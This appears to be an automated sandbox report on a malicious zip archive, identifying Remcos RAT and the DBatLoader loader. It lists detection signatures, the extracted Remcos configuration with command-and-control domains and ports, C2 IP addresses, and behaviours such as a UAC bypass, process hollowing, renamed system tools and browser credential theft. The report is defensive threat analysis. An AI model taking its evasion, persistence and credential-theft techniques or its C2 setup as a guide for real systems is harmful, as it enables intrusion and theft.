Windows Analysis Report
WATER TREATMENT PROJECT.zip

Overview

General Information

Sample name: WATER TREATMENT PROJECT.zip
Analysis ID: 1638153
MD5: 76196e5e8da8927afe142ecc98cf57c4
SHA1: f28ce2a9c332468f31112ad580fdedd14ac1ac30
SHA256: 5d5712ca753bdf109dc9851b2243a6bfc049f7f279c4e34fb625a5a95b210aae
Infos:

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Rundll32 Activity
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Antivirus detection for URL or domain
Source: baddieszn.duckdns.org Avira URL Cloud: Label: phishing
Source: conquer25.duckdns.org Avira URL Cloud: Label: phishing
Source: bahadii.duckdns.org Avira URL Cloud: Label: phishing
Source: unforseen.duckdns.org Avira URL Cloud: Label: phishing
Found malware configuration
Source: 62.2.SndVol.exe.6831a8e.1.raw.unpack Malware Configuration Extractor: Remcos {"Host:Port:Password": ["baddieszn.duckdns.org:5200:1", "bahadii.duckdns.org:2500:1", "conquer25.duckdns.org:2404:0", "unforseen.duckdns.org:2404:0"], "Assigned name": "WE GO AGAIN", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-14MUP4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara detected Remcos RAT
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.000000000315E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2144370193.0000000003110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2293950327.0000000003180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_00407687 GetProcAddress,FreeLibrary,CryptUnprotectData, 47_2_00407687
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 62_2_00433B64
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_068649F2 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 62_2_068649F2
Source: SndVol.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.6831a8e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 62.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6808, type: MEMORYSTR

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00406ABC _wcslen,CoGetObject, 62_2_00406ABC
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source: Binary string: extrac32.pdb source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr
Source: Binary string: rundll32.pdb source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source: Binary string: rundll32.pdbGCTL source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source: Binary string: certutil.pdb source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source: Binary string: cmd.pdb source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source: Binary string: easinvoker.pdbGCTL source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: certutil.pdbGCTL source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source: Binary string: extrac32.pdbGCTL source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr
Source: C:\Users\Public\ANYDESK.PIF Code function: 26_2_02B052F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 26_2_02B052F8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_053610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 35_2_053610F1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 35_2_05366580 FindFirstFileExA, 35_2_05366580
Source: C:\Windows\SysWOW64\recover.exe Code function: 47_2_0040B477 FindFirstFileW,FindNextFileW, 47_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe Code function: 49_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 49_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe Code function: 53_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 53_2_00407898
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 62_2_004090DC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 62_2_0041C7E5
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 62_2_0040B8BA
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0044E989 FindFirstFileExA, 62_2_0044E989
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 62_2_00408CDE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 62_2_00419CEE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 62_2_00407EDD
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00406F13 FindFirstFileW,FindNextFileW, 62_2_00406F13
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684D673 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 62_2_0684D673
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0683C543 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 62_2_0683C543
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06839F6A __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 62_2_06839F6A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06837DA1 FindFirstFileW,FindNextFileW, 62_2_06837DA1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_06838D6B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 62_2_06838D6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0684AB7C FindFirstFileW, 62_2_0684AB7C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_0687F817 FindFirstFileExA, 62_2_0687F817
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 62_2_00407357

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56053 -> 193.9.36.1:5200
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56054 -> 194.59.31.85:2500
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.16:56055 -> 194.59.31.85:2500
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: baddieszn.duckdns.org
Source: Malware configuration extractor URLs: bahadii.duckdns.org
Source: Malware configuration extractor URLs: conquer25.duckdns.org
Source: Malware configuration extractor URLs: unforseen.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: bahadii.duckdns.org
Source: unknown DNS query: name: baddieszn.duckdns.org
Uses ping.exe to check the status of other devices and networks
Source: C:\Users\Public\alpha.pif Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.16:56053 -> 193.9.36.1:5200
Source: global traffic TCP traffic: 192.168.2.16:56054 -> 194.59.31.85:2500
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.16:55933 -> 1.1.1.1:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.16:56056 -> 178.237.33.50:80
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 62_2_004062E2 ShellExecuteW,URLDownloadToFileW, 62_2_004062E2
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: recover.exe, 0000002F.00000003.2130745608.0000000002F8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0D00000000149202E898FCF241BC257D65498D6FF3228000000000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C00630061006C0069005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: recover.exe, 0000002F.00000003.2130745608.0000000002F8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0D00000000149202E898FCF241BC257D65498D6FF3228000000000000038A1BB1005E5101AA1BB08002B2A56C200006D737073742E646C6C00000000004E495441F9BFB80100AA0037D96E0000000043003A005C00550073006500720073005C00630061006C0069005C0044006F00630075006D0065006E00740073005C004F00750074006C006F006F006B002000460069006C00650073005C004F00750074006C006F006F006B00200044006100740061002000460069006C00650020002D0020004E006F0045006D00610069006C002E007000730074000000file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: baddieszn.duckdns.org
Source: global traffic DNS traffic detected: DNS query: bahadii.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp)
Source: SndVol.exe, 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000002.2295912725.00000000031AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpP
Source: colorcpl.exe, 00000023.00000002.2293950327.0000000003187000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/son.gp
Source: bhv3B03.tmp.47.dr String found in binary or memory: http://ocsp.digicert.com0
